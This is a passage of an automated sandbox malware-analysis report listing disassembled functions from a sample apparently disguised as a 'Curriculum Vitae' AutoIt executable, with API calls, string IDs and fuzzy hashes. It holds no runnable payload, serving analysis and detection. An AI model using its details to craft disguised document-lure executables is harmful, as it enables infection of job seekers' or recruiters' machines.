                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: GlobalMemorySleepStatus
                      • String ID: @
                      • API String ID: 2783356886-2766056989
                      • Opcode ID: 446b58002055605fdc806c21d577ba7e4004af4109cb454859a7422a4db974b3
                      • Instruction ID: f639c63101cb1126ed9a070a8d417836cbff7f8fe8acbf9cbf93a7fa9a626460
                      • Opcode Fuzzy Hash: 446b58002055605fdc806c21d577ba7e4004af4109cb454859a7422a4db974b3
                      • Instruction Fuzzy Hash: AA5124725187499BD320AF10D886BAFBBF8FF84300F81885DF1D9911A5EB708529CB76
                      Function 00DB5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                      Download Yara Rule
                      APIs
                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00DB57E0
                      • _wcslen.LIBCMT ref: 00DB57EC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: BuffCharUpper_wcslen
                      • String ID: CALLARGARRAY
                      • API String ID: 157775604-1150593374
                      • Opcode ID: f87dac24b127d433c95e3d891fe13b4f62b2cc0957ea5bf6ce4e4dfb8ccf8040
                      • Instruction ID: de28ae3a1f513046365568aa684d4dc362a309199bb71eeac3730e0f061c16bd
                      • Opcode Fuzzy Hash: f87dac24b127d433c95e3d891fe13b4f62b2cc0957ea5bf6ce4e4dfb8ccf8040
                      • Instruction Fuzzy Hash: B341AC35A0020ADFCB14DFA9D881AEEBBB5FF59320F144069E506A7255E770DD81CBB0
                      Function 00DAD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                      Download Yara Rule
                      APIs
                      • _wcslen.LIBCMT ref: 00DAD130
                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DAD13A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CrackInternet_wcslen
                      • String ID: |
                      • API String ID: 596671847-2343686810
                      • Opcode ID: 940f6aa697983986686e39d47e9f1caa059ff75baca04b769d8bb90e225b7834
                      • Instruction ID: 1caa9c71cc6d583c04209bcd225f037832afc4c9f9e683db429c76d6d0829aae
                      • Opcode Fuzzy Hash: 940f6aa697983986686e39d47e9f1caa059ff75baca04b769d8bb90e225b7834
                      • Instruction Fuzzy Hash: C4310C71D01219ABCF15EFA4CC85AEEBFBAFF09300F104019F815A6165D735AA56DB70
                      Function 00DC356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32(?,?,?,?), ref: 00DC3621
                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DC365C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$DestroyMove
                      • String ID: static
                      • API String ID: 2139405536-2160076837
                      • Opcode ID: 972b8e7c656ce735e01692a6b55cdb6dc110886de30ad70d9ec5025eefa86f6f
                      • Instruction ID: 92c24bce31cdef77f99c07c58644b6d8ccc587f3d50298507cc9943bea2dc821
                      • Opcode Fuzzy Hash: 972b8e7c656ce735e01692a6b55cdb6dc110886de30ad70d9ec5025eefa86f6f
                      • Instruction Fuzzy Hash: 2831AA71110205AEDB149F68CC80FFB73A9FF88720F10961DF9A997290DA31AD81DB70
                      Function 00DC4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00DC461F
                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DC4634
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: '
                      • API String ID: 3850602802-1997036262
                      • Opcode ID: f14c7941a92e10a276953c986b3187d13fab9cf54940a71648e6ad5c397f20df
                      • Instruction ID: 03fe4ffa9d7810966989f27aed55779400a950c16fbb21f3d3c24a2a694e05ed
                      • Opcode Fuzzy Hash: f14c7941a92e10a276953c986b3187d13fab9cf54940a71648e6ad5c397f20df
                      • Instruction Fuzzy Hash: 81310874A0120A9FDB14CF69C990FDA7BB5FF49300F14406AE905AB395D770A941CFA0
                      Function 00DC31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DC327C
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC3287
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: Combobox
                      • API String ID: 3850602802-2096851135
                      • Opcode ID: 8f4c74c53b835df9f92713433a0f0aca83bf4c8881afd1144f3508678cab8351
                      • Instruction ID: f8dcfb06c1b5329756ca02468ab14b18dba84f2344c04cdb6e7263eba955fcbd
                      • Opcode Fuzzy Hash: 8f4c74c53b835df9f92713433a0f0aca83bf4c8881afd1144f3508678cab8351
                      • Instruction Fuzzy Hash: 0C11E27130020A7FEF259F94DC80FBB776AEB94364F148128F9189B290D631DD518770
                      Function 00DC3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D3600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D3604C
                        • Part of subcall function 00D3600E: GetStockObject.GDI32(00000011), ref: 00D36060
                        • Part of subcall function 00D3600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D3606A
                      • GetWindowRect.USER32(00000000,?), ref: 00DC377A
                      • GetSysColor.USER32(00000012), ref: 00DC3794
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                      • String ID: static
                      • API String ID: 1983116058-2160076837
                      • Opcode ID: e6ad2bffbf5c9d2bfd2a8ad7a8b474eb708892b2bc7e1aff359d3fcdf7e0f358
                      • Instruction ID: 9df881e9d2f37683fd20f9e779ae53e8c70a5a461cd31dc13fd7021030f1cfc1
                      • Opcode Fuzzy Hash: e6ad2bffbf5c9d2bfd2a8ad7a8b474eb708892b2bc7e1aff359d3fcdf7e0f358
                      • Instruction Fuzzy Hash: 75113AB261020AAFDF01DFA8CC46EEA7BF8FB08314F045518F955E3250D775E9519B60
                      Function 00DACD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                      Download Yara Rule
                      APIs
                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DACD7D
                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DACDA6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Internet$OpenOption
                      • String ID: <local>
                      • API String ID: 942729171-4266983199
                      • Opcode ID: 46bb508ad7a6f458fe28dac97f717c875bcc3e9300b61a349f236cdef294efca
                      • Instruction ID: 776c0dce2c6ce5c38a03246978b5d1fba3247122ba5838f51129540bb118562f
                      • Opcode Fuzzy Hash: 46bb508ad7a6f458fe28dac97f717c875bcc3e9300b61a349f236cdef294efca
                      • Instruction Fuzzy Hash: 1811CE71225636BADB384B668C89EF7BEACEF137B4F00522AB15983180D7749841D6F0
                      Function 00DC3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetWindowTextLengthW.USER32(00000000), ref: 00DC34AB
                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DC34BA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LengthMessageSendTextWindow
                      • String ID: edit
                      • API String ID: 2978978980-2167791130
                      • Opcode ID: e619f19e306803b47fa5f0b4c2bf576c2502d5bcd45f88c436c8d1ce36004635
                      • Instruction ID: 7762afe5fb0c583e3b2f87c6453b3581edb091d004af41d8321a742170b48cd6
                      • Opcode Fuzzy Hash: e619f19e306803b47fa5f0b4c2bf576c2502d5bcd45f88c436c8d1ce36004635
                      • Instruction Fuzzy Hash: 7C119D7110420AAEEB164F64DC40FAA376AEB05374F548328FA64931E0C731DC519B70
                      Function 00D96C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • CharUpperBuffW.USER32(?,?,?), ref: 00D96CB6
                      • _wcslen.LIBCMT ref: 00D96CC2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$BuffCharUpper
                      • String ID: STOP
                      • API String ID: 1256254125-2411985666
                      • Opcode ID: 42b48d40192b9a70e1e55476f54ed05fdf1f0d1779d392dc04a4c57da67a5e46
                      • Instruction ID: 2993b9f117f7c162655955a0d49afbaeeb526af07f8e2a079759d86958c97218
                      • Opcode Fuzzy Hash: 42b48d40192b9a70e1e55476f54ed05fdf1f0d1779d392dc04a4c57da67a5e46
                      • Instruction Fuzzy Hash: ED010032A105278ACF21AFBDDC908BF7BA4EE60710B050528F86292290EA31E840C770
                      Function 00D91CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00D93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00D93CCA
                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D91D4C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_wcslen
                      • String ID: ComboBox$ListBox
                      • API String ID: 624084870-1403004172
                      • Opcode ID: 84c2b59c0014ef702a511f781e168c94aaa748363ef16e5f10eb0b7dc1f95d07
                      • Instruction ID: ea040de7d8ec009f8fab94bb5852d859fec92b9733954b302a701a85065f752a
                      • Opcode Fuzzy Hash: 84c2b59c0014ef702a511f781e168c94aaa748363ef16e5f10eb0b7dc1f95d07
                      • Instruction Fuzzy Hash: F801D875601219AB8F08EBA4CD55DFEB768EF46350F040619F972573D1EA705908C670
                      Function 00D91BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00D93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00D93CCA
                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00D91C46
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_wcslen
                      • String ID: ComboBox$ListBox
                      • API String ID: 624084870-1403004172
                      • Opcode ID: 5cc4ae9267039234d229aa44528547060b224cdb443b7a78d1882b26f57fdbcf
                      • Instruction ID: 2ba8fd771a078a02c543d04b6d7a574fb4db5bd81d88f59d8a90da6b2a1ea5de
                      • Opcode Fuzzy Hash: 5cc4ae9267039234d229aa44528547060b224cdb443b7a78d1882b26f57fdbcf
                      • Instruction Fuzzy Hash: F801A7756851096ACF05EB90CA61EFFB7A8DF51340F140019B91667281EAA09E1CC6B1
                      Function 00D91C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00D93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00D93CCA
                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00D91CC8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ClassMessageNameSend_wcslen
                      • String ID: ComboBox$ListBox
                      • API String ID: 624084870-1403004172
                      • Opcode ID: abda74e462838d7ec257e4a0e35a537aa12364edef3f515efacf3c56d7e0f804
                      • Instruction ID: 221bd1bfdcb0b5cb1edeadef07faefa51b36509eed66bdd4071cf90b6a4a7014
                      • Opcode Fuzzy Hash: abda74e462838d7ec257e4a0e35a537aa12364edef3f515efacf3c56d7e0f804
                      • Instruction Fuzzy Hash: D801D6B96801196BCF04EBA1CA11EFEF7A8DB11340F540015B902B3281EAA09F18C671
                      Function 00DC8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E03018,00E0305C), ref: 00DC81BF
                      • CloseHandle.KERNEL32 ref: 00DC81D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseCreateHandleProcess
                      • String ID: \0
                      • API String ID: 3712363035-3218720685
                      • Opcode ID: c665f1270251cdd986b6ff3ca49b925afe5bb61aa1545173115fb1a368aa0a1b
                      • Instruction ID: 45ee12c5044b56f41848c06abab9409648666705527eb3f2554a698e10e8a7b0
                      • Opcode Fuzzy Hash: c665f1270251cdd986b6ff3ca49b925afe5bb61aa1545173115fb1a368aa0a1b
                      • Instruction Fuzzy Hash: 5CF05EF1641301BEF7206772AC4AFB73A5CEB05751F004465FF08E61A2D6768E8892F8
                      Function 00DB747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen
                      • String ID: 3, 3, 16, 1
                      • API String ID: 176396367-3042988571
                      • Opcode ID: bbec46f7bc964da16a11308d6c65f3fbe507a0b92d5ef412f1aefde5d57906b8
                      • Instruction ID: 6c4dc9165e804025c3c2764ab6da31d2787ea46ab3393c8cd8382c23534be18c
                      • Opcode Fuzzy Hash: bbec46f7bc964da16a11308d6c65f3fbe507a0b92d5ef412f1aefde5d57906b8
                      • Instruction Fuzzy Hash: 8EE02B026042206592311279DCC29FF5689CFC5762714182FFD82C2266EA94CDD197B1
                      Function 00D90B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                      Download Yara Rule
                      APIs
                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00D90B23
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Message
                      • String ID: AutoIt$Error allocating memory.
                      • API String ID: 2030045667-4017498283
                      • Opcode ID: 5b693fb01f8ab353cd463ff899bdc9d524d91621bf8b0cfc4f5bda9133efe6ac
                      • Instruction ID: 1e3f4aa65f817b017cdac5b8d9cb4b56b0f0447fbcebd1a5ca43d5809f6ce456
                      • Opcode Fuzzy Hash: 5b693fb01f8ab353cd463ff899bdc9d524d91621bf8b0cfc4f5bda9133efe6ac
                      • Instruction Fuzzy Hash: 07E0DF322843093BD21437947C03FC97A84CF05B26F14442AFB8C969D38AE264A00AB9
                      Function 00D50D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D4F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D50D71,?,?,?,00D3100A), ref: 00D4F7CE
                      • IsDebuggerPresent.KERNEL32(?,?,?,00D3100A), ref: 00D50D75
                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D3100A), ref: 00D50D84
                      Strings
                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D50D7F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                      • API String ID: 55579361-631824599
                      • Opcode ID: e1556f17db15335a19f3a1c9074fb2ca2bfab382fb69745c6a02625d81c1f7d2
                      • Instruction ID: 809a027437f518638d103c7a8cffb7d63656709b8777b288a323c35f062b7be2
                      • Opcode Fuzzy Hash: e1556f17db15335a19f3a1c9074fb2ca2bfab382fb69745c6a02625d81c1f7d2
                      • Instruction Fuzzy Hash: 23E039702003428BD7209FA8D404B82BBE5EB00741F04892EE886C6B51DBB5E4488BB1
                      Function 00D4E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                      Download Yara Rule
                      APIs
                      • __Init_thread_footer.LIBCMT ref: 00D4E3D5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Init_thread_footer
                      • String ID: 0%$8%
                      • API String ID: 1385522511-2949748613
